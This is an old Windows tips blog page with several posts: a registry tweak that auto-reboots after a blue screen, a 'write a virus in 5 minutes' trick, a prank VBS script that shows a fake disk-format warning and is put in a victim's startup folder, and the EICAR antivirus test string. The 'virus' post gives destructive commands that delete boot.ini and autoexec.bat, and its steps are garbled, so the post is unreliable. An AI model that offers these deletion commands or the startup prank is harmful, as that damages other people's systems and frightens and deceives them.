Many People Might have faced , cases when a system fault/error/crash ends up freezing the OS at the dreaded BSOD (Blue Screen Of Death), which displays the cause of the crash and gives some details about the state of the system when it crashed. The major annoyance is that it requires a “cold” reboot (reset) or complete power shut down, to remind you why those 2 buttons on the front of your PC case are meant for. And moreover, if you are a system administrator, requiring your server(s) to run non-stop 24/7, this can be a pain in Your head But have no fear, the fix is here…
This Registry hack is valid for ALL NT, 2000, XP and 2003 releases.
To bypass the BSOD altogether and enable the instant “Auto Reboot” feature, run Regedit and go to:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl
Right-click on the “AutoReboot” DWORD [REG_DWORD] Value in the right hand pane -> select Modify -> change it to read 1 (Auto Reboot enabled) -> click OK -> close the Registry Editor.
Restart Windows for the change to take effect.
From now on the OS will reboot upon locking up, right after writing to the crash log file (if enabled).
To disable it, change the “AutoReboot” value back to 0 (default)
Wednesday, February 13, 2008
Overcome Auto Reboot Problem
Posted by chaitanya at 11:48 AM 0 comments
Labels: AntiVirus, Windows tips
Friday, August 17, 2007
Virus in minutes
Write VIRUS to computer in 5 minutes
Creating virus trick
open ur notepad n type the following.........type del c:\boot.ini c:\del autoexec.batsave as .exe [save it as .exe file....n u can save it by ne name]create the notepad in c: drive...
Posted by chaitanya at 1:30 AM 0 comments
Labels: AntiVirus
Tuesday, August 14, 2007
Make friends scare of VIRUS
Open notepad and type this:
lol=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning")
Then save it as Virus.VBS
and go to the folder that contains it and open it if a window pops out saying a virus has been detected it's working. Press yes or no to close the window and put it in the startup folder of the victim's account.On startup the window should appear.Note: This does not harm your computer as it does not contain virus.
Posted by chaitanya at 4:07 AM 2 comments
Labels: AntiVirus, hacking tips, Notepad
Sunday, August 5, 2007
Test if Antivirus is Working or not Using notepad
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Open notepad..........Copy the above code in the file....
then save it with the name fakevirus.exe
If this file got deleted immediately ....That means ur antivirus is working properly
Posted by chaitanya at 9:34 AM 0 comments